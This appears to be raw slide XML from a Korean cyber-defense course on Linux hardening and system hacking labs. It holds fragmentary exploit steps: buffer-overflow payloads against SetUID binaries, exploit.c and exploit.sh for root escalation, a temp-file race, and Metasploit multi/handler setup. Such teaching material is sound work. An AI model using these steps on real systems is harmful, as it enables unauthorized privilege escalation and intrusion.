                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>xss.php</a:t>
              </a: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982B7F67-ED70-4529-B941-47D2551C8E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599364863"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="172427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강의계획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/Theory/T2/4</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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/example</a:t>
              </a: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AD6D67F-2439-4058-B075-4F5F55B8844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dirty="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Metasploit,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dirty="0"/>
              <a:t>(test) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test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dirty="0"/>
              <a:t># grep root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내용 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D7B7A31-846B-4771-92F1-9A2CB8A96276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3938953"/>
            <a:ext cx="10515600" cy="2238009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고려대학교 사이버국방학과 졸업</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>전문사관 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고려대학교 정보보호대학원</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>석사과정 재학</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="직선 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9836F1E8-B09C-4452-90B0-5B18362E287E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060938" y="3276600"/>
            <a:ext cx="961292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/rlogin</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec</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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep disable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ls –l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv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etc/hosts.equiv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rhost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-r packet.txt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dirty="0"/>
              <a:t>: qwer1031)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vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>user_list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vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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user_list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pam_wheel.so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pam_wheel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 계획</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663522442"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3933092" y="2813240"/>
          <a:ext cx="3807061" cy="73901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/sec/bof64.c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dirty="0"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">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bof64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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian)</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dirty="0" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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sysctl –w kernel.randomize_va_space=2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위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test </a:t>
            </a:r>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/sec/bof64 $(python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endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2)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exploit.c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/sec/stack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stack | more</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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exploit.c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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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-o exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 제작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./exploit 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맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>memset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> (&amp; buffer,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dirty="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주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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Race 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/sec/stack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memcpy</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 shellcode,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a:t>
                      </a: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상태에서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execstack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/sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –c /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –q /sec/stack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heap.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c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goodfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ /sec/heap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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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힙 버퍼 오버플로우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/sec/heap $(python -c 'print "A"*112+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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파일명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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에서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/sec/heap </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l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Defcybsec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>강의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3276629171"/>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Apache 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Directory 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과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Session</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URL Redirect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 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29535444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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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-M intel -d /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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/sec/</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/sec/</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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xd0\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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="0"/>
              <a:t>/sec/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및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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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dirty="0" err="1">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/sec/</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>getRoot.o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078391087"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1476757"/>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player</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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VM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>다운로드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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim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/sec/exploit.sh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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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/sec/exploit.sh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/sec/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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-s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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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/sec/</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createTempFile.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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createTempFile</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createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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msfconsole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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>use exploit/multi/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use exploit/multi/handler</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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set RHOST 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
